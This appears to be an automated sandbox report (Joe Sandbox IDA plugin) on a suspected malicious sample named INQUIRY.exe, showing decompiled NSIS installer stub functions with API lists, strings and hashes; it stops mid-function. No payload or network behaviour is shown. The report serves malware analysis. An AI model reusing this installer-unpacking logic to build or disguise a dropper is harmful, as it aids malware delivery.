0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x00000000
0x0040667d
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}

0x00405d87
0x00405d90
0x00000000
0x00405d9d
0x00405d93
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 00405D87
FindClose.KERNEL32(00000000), ref: 00405D93

Strings

$B, xrefs: 00405D7D

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: $B
API String ID: 2295610775-2366330246
Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA3 Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405dab
0x00405dae
0x00405db5
0x00405dbd
0x00405dca
0x00000000
0x00405dd1
0x00405dc0
0x00405dc8
0x00000000
0x00000000
0x00405dd9

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA

Uniqueness

Uniqueness Score: -1.00%

Function 004035E3 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0; // 0x51d818
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t24 =  *0x423eb8; // 0x80
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x423f20 = _t24 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40; // 0x0
							if(__eflags != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t39 =  *0x423680; // 0x0
							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0; // 0x400000
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 = _t75;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x423ed8; // 0x521d84
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x78
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004035e9
0x004035f2
0x004035f9
0x004035fb
0x0040360f
0x00403621
0x0040362b
0x00403630
0x00403636
0x00403649
0x00403649
0x00403654
0x004035fd
0x00403608
0x00403608
0x00403659
0x0040365e
0x00403663
0x0040366c
0x00403678
0x004036ff
0x00403707
0x00403710
0x00403710
0x00403726
0x0040372c
0x0040373a
0x004037c9
0x004037d1
0x004037db
0x004037e0
0x004037e6
0x00403865
0x0040386a
0x0040386c
0x00403888
0x00000000
0x00403888
0x0040386e
0x00403874
0x0040387c
0x0040387c
0x00000000
0x00403874
0x004037f0
0x00403801
0x00403803
0x00403805
0x0040380c
0x0040380c
0x00403814
0x0040381c
0x0040381e
0x00403820
0x00403829
0x0040382c
0x00403832
0x00403832
0x00403838
0x00403851
0x0040385b
0x00000000
0x00403860
0x004037d3
0x004037d5
0x00000000
0x00403740
0x00403740
0x00403746
0x00403750
0x00403758
0x00403762
0x00403768
0x00403776
0x0040388d
0x0040388d
0x00000000
0x0040388d
0x0040377c
0x00403785
0x004037c4
0x00000000
0x004037c4
0x0040367e
0x0040367e
0x00403683
0x00000000
0x00000000
0x00403688
0x0040368d
0x0040369d
0x004036a2
0x004036a9
0x00000000
0x00000000
0x004036ad
0x004036af
0x004036bc
0x004036bc
0x004036c4
0x004036ca
0x004036f2
0x004036fa
0x00000000
0x004036dc
0x004036dd
0x004036e6
0x004036ec
0x004036ed
0x00000000
0x004036ed
0x004036e8
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x004036ca

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\INQUIRY.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
lstrlenA.KERNEL32(xzfdi,?,?,?,xzfdi,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\INQUIRY.exe" ), ref: 004036BF
lstrcmpiA.KERNEL32(?,.exe,xzfdi,?,?,?,xzfdi,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
GetFileAttributesA.KERNEL32(xzfdi), ref: 004036DD
LoadImageA.USER32 ref: 00403726

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

RegisterClassA.USER32 ref: 0040376D
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
CreateWindowExA.USER32 ref: 004037BE
ShowWindow.USER32(00000005,00000000), ref: 004037F0
LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
GetClassInfoA.USER32 ref: 0040381C
GetClassInfoA.USER32 ref: 00403829
RegisterClassA.USER32 ref: 00403832
DialogBoxParamA.USER32 ref: 00403851

Strings

1033, xrefs: 00403603, 0040364F
Control Panel\Desktop\ResourceLocale, xrefs: 00403617
xzfdi, xrefs: 0040368D, 00403695, 004036A2, 004036EC, 004036F2
RichEdit, xrefs: 00403823
RichEd32, xrefs: 00403807
RichEd20, xrefs: 004037FC
.exe, xrefs: 004036CC
_Nb, xrefs: 0040377C, 00403781
C:\Users\user\AppData\Local\Temp, xrefs: 00403663, 0040366B, 004036F9, 004036FF, 0040370F
"C:\Users\user\Desktop\INQUIRY.exe" , xrefs: 004035EF
.DEFAULT\Control Panel\International, xrefs: 0040363F
RichEdit20A, xrefs: 00403814, 0040381A
C:\Users\user\AppData\Local\Temp\, xrefs: 004035E7
@6B, xrefs: 00403735

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\INQUIRY.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$xzfdi
API String ID: 914957316-518817336
Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C5B Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				signed int _t63;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\INQUIRY.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\jones\\Desktop\\INQUIRY.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\INQUIRY.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4; // 0xb600
					if(__eflags == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t63 =  *0x423eb4; // 0xb600
							_t65 = E004031DA(_t63 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x50207
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t79 =  *0x423eb4; // 0xb600
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4; // 0xb600
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x0
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x32d2
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402c69
0x00402c6c
0x00402c86
0x00402c8b
0x00402c9e
0x00402ca3
0x00402ca9
0x00000000
0x00402cab
0x00402cbc
0x00402ccd
0x00402cd4
0x00402cda
0x00402cdc
0x00402ce1
0x00402ce3
0x00402dd3
0x00402dd5
0x00402dda
0x00402de1
0x00000000
0x00000000
0x00402de7
0x00402dea
0x00402e16
0x00402e1b
0x00402e26
0x00402e28
0x00402e39
0x00402e54
0x00402e5a
0x00402e5d
0x00402e62
0x00402e78
0x00402e81
0x00402e91
0x00402ea3
0x00402ea8
0x00402ead
0x00402eb0
0x00402eb9
0x00402ebd
0x00402ec5
0x00402eca
0x00402ecc
0x00402ecc
0x00402ecc
0x00402ed4
0x00402ed4
0x00402ed7
0x00402ed8
0x00402ed8
0x00402edb
0x00402edd
0x00402edd
0x00402edd
0x00402ee0
0x00402ee7
0x00402ef3
0x00402ef8
0x00000000
0x00402ef8
0x00000000
0x00402eb0
0x00000000
0x00402e64
0x00402df2
0x00402dfd
0x00402e02
0x00402e04
0x00000000
0x00000000
0x00402e0d
0x00402e10
0x00000000
0x00000000
0x00000000
0x00402ce9
0x00402ce9
0x00402ce9
0x00402cee
0x00402cf2
0x00402cf9
0x00402cfe
0x00402d00
0x00402d02
0x00402d02
0x00402d0a
0x00402d0f
0x00402d11
0x00402e70
0x00402eb2
0x00000000
0x00402eb2
0x00402d17
0x00402d1d
0x00402d9d
0x00402da1
0x00402da4
0x00402da9
0x00000000
0x00402da1
0x00402d2a
0x00402d2f
0x00402d32
0x00402d37
0x00000000
0x00000000
0x00402d39
0x00402d40
0x00000000
0x00000000
0x00402d42
0x00402d49
0x00000000
0x00000000
0x00402d4b
0x00402d52
0x00000000
0x00000000
0x00402d54
0x00402d5b
0x00000000
0x00000000
0x00402d5d
0x00402d63
0x00402d6c
0x00402d72
0x00402d75
0x00402d77
0x00402d7d
0x00000000
0x00000000
0x00402d83
0x00402d87
0x00402d8f
0x00402d8f
0x00402d92
0x00402d95
0x00402d97
0x00402d99
0x00402d99
0x00000000
0x00402d97
0x00402d89
0x00402d8d
0x00000000
0x00000000
0x00000000
0x00402daa
0x00402daa
0x00402db0
0x00402dc0
0x00402dc0
0x00402dc3
0x00402dc9
0x00402dcb
0x00402dcb
0x00000000
0x00402ce9

APIs

GetTickCount.KERNEL32 ref: 00402C6F
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\INQUIRY.exe,00000400), ref: 00402C8B

Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\INQUIRY.exe,80000000,00000003), ref: 00405760
Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INQUIRY.exe,C:\Users\user\Desktop\INQUIRY.exe,80000000,00000003), ref: 00402CD4
GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B

Strings

C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
soft, xrefs: 00402D4B
"C:\Users\user\Desktop\INQUIRY.exe" , xrefs: 00402C68
Inst, xrefs: 00402D42
Null, xrefs: 00402D54
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
Error launching installer, xrefs: 00402CAB
C:\Users\user\Desktop\INQUIRY.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\INQUIRY.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\INQUIRY.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-927838801
Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
